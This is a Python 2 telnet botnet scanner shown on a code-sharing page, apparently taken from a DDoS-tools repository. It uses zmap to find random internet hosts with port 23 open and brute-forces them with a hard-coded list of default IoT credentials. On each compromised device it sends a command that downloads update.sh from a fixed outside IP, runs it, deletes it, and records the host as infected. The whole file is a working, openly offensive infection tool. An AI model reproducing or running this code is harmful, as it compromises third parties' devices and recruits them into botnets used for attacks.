Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Scanning/TELNET/telnet_zmap_scanner.py
5038 views
1
#!/usr/bin/python

2
import threading

3
import sys, os, re, time, random, socket, select, subprocess

4
# USE ONLY 1 TO 16 THREADS UNLESS U WANNA CRASH UR SERVER

5


6
if len(sys.argv) < 3:

7
    print "Usage: python "+sys.argv[0]+" <threads> <output file>"

8
    sys.exit()

9


10
global rekdevice

11
rekdevice = "cd /tmp; wget http://185.10.68.196/update.sh; busybox wget http://185.10.68.196/update.sh; chmod 777 update.sh; sh update.sh; rm -f update.sh" #command to send

12


13
combo = [ 

14
        "root:root",

15
        "root:",

16
        "admin:admin",

17
        "telnet:telnet",

18
        "support:support",

19
        "user:user",

20
        "admin:",

21
        "admin:password",

22
        "root:vizxv",

23
        "root:admin",

24
        "root:xc3511",

25
        "root:888888",

26
        "root:xmhdipc",

27
        "root:default",

28
        "root:juantech",

29
        "root:123456",

30
        "root:54321",

31
        "root:12345",

32
        "root:pass",

33
        "ubnt:ubnt",

34
        "root:klv1234",

35
        "root:Zte521",

36
        "root:hi3518",

37
        "root:jvbzd",

38
        "root:anko",

39
        "root:zlxx.",

40
        "root:7ujMko0vizxv",

41
        "root:7ujMko0admin",

42
        "root:system",

43
        "root:ikwb",

44
        "root:dreambox",

45
        "root:user",

46
        "root:realtek",

47
        "root:00000000",

48
        "admin:1111111",

49
        "admin:1234",

50
        "admin:12345",

51
        "admin:54321",

52
        "admin:123456",

53
        "admin:7ujMko0admin",

54
        "admin:1234",

55
        "admin:pass",

56
        "admin:meinsm",

57
        "admin:admin1234",

58
        "root:1111",

59
        "admin:smcadmin",

60
        "admin:1111",

61
        "root:666666",

62
        "root:password",

63
        "root:1234",

64
        "root:klv123",

65
        "Administrator:admin",

66
        "service:service",

67
        "supervisor:supervisor",

68
        "guest:guest",

69
        "guest:12345",

70
        "guest:12345",

71
        "admin1:password",

72
        "administrator:1234",

73
        "666666:666666",

74
        "888888:888888",

75
        "tech:tech",

76
        "mother:fucker"

77
]

78


79
threads = int(sys.argv[1])

80
output_file = sys.argv[2]

81


82
def readUntil(tn, string, timeout=8):

83
    buf = ''

84
    start_time = time.time()

85
    while time.time() - start_time < timeout:

86
        buf += tn.recv(1024)

87
        time.sleep(0.1)

88
        if string in buf: return buf

89
    raise Exception('TIMEOUT!')

90


91
def recvTimeout(sock, size, timeout=8):

92
    sock.setblocking(0)

93
    ready = select.select([sock], [], [], timeout)

94
    if ready[0]:

95
        data = sock.recv(size)

96
        return data

97
    return ""

98


99
class router(threading.Thread):

100
    def __init__ (self, ip):

101
        threading.Thread.__init__(self)

102
        self.ip = str(ip).rstrip('\n')

103
    def run(self):

104
        global fh

105
        username = ""

106
        password = ""

107
        for passwd in combo:

108
            if ":n/a" in passwd:

109
                password=""

110
            else:

111
                password=passwd.split(":")[1]

112
            if "n/a:" in passwd:

113
                username=""

114
            else:

115
                username=passwd.split(":")[0]

116
            try:

117
                tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

118
                tn.settimeout(1)

119
                tn.connect((self.ip, 23))

120
            except Exception:

121
                tn.close()

122
                break

123
            try:

124
                hoho = ''

125
                hoho += readUntil(tn, ":")

126
                if ":" in hoho:

127
                    tn.send(username + "\r\n")

128
                    time.sleep(0.1)

129
                else:

130
                    tn.close()

131
                    return

132
                hoho = ''

133
                hoho += readUntil(tn, ":")

134
                if ":" in hoho:

135
                    tn.send(password + "\r\n")

136
                    time.sleep(0.1)

137
                prompt = ''

138
                prompt += recvTimeout(tn, 40960)

139
                if "#" in prompt or "$" in prompt:

140
                    for bad in ["nvalid", "ailed", "ncorrect", "enied", "error", "goodbye", "bad", "timeout", "##"]:

141
                        if bad in prompt.lower():

142
                            print "\033[32m[\033[31m+\033[32m] [\033[31mFAILED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)

143
                            tn.close()

144
                            continue

145
                    success = True

146
                else:

147
                    success = False

148
                    tn.close()

149
                if success == True:

150
                    try:

151
                        print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)

152
                        fh.write(self.ip + ":23 " + username + ":" + password + "\n")

153
                        fh.flush()

154
                        tn.send("sh\r\n")

155
                        time.sleep(0.1)

156
                        tn.send("shell\r\n")

157
                        time.sleep(0.1)

158
                        tn.send("ls /\r\n")

159
                        time.sleep(1)

160
                        timeout = 8

161
                        buf = ''

162
                        start_time = time.time()

163
                        while time.time() - start_time < timeout:

164
                            buf += recvTimeout(tn, 40960)

165
                            time.sleep(0.1)

166
                            if "tmp" in buf and "unrecognized" not in buf:

167
                                tn.send(rekdevice + "\r\n")

168
                                print "\033[32m[\033[31m+\033[32m] \033[33mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)

169
                                f = open("infected.txt", "a")

170
                                f.write(self.ip + ":23 " + username + ":" + password + "\n")

171
                                f.close()

172
                                time.sleep(10)

173
                                tn.close()

174
                                return

175
                        tn.close()

176
                        return

177
                    except:

178
                        tn.close()

179
                else:

180
                    tn.close()

181
            except:

182
                tn.close()

183


184
def worker():

185
    while True:

186
        cmd = "zmap -p23 -N 10000 -f saddr -q --verbosity=0"

187
        process = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)

188
        for line in iter(process.stdout.readline, ''):  # replace '' with b'' for Python 3

189
            line = line.replace("\n", "")

190
            threadstarted = False

191
            while not threadstarted:

192
                try:

193
                    thread = router(line)

194
                    thread.start()

195
                    threadstarted = True

196
                except:

197
                    pass

198


199


200
global fh

201
fh = open(output_file, "a")

202
for l in xrange(threads):

203
    try:

204
        t = threading.Thread(target=worker)

205
        t.start()

206
    except:

207
        pass

208


209
print "Started " + str(threads) + " scanner threads! Press enter to stop."

210


211
raw_input()

212
os.kill(os.getpid(), 9)

213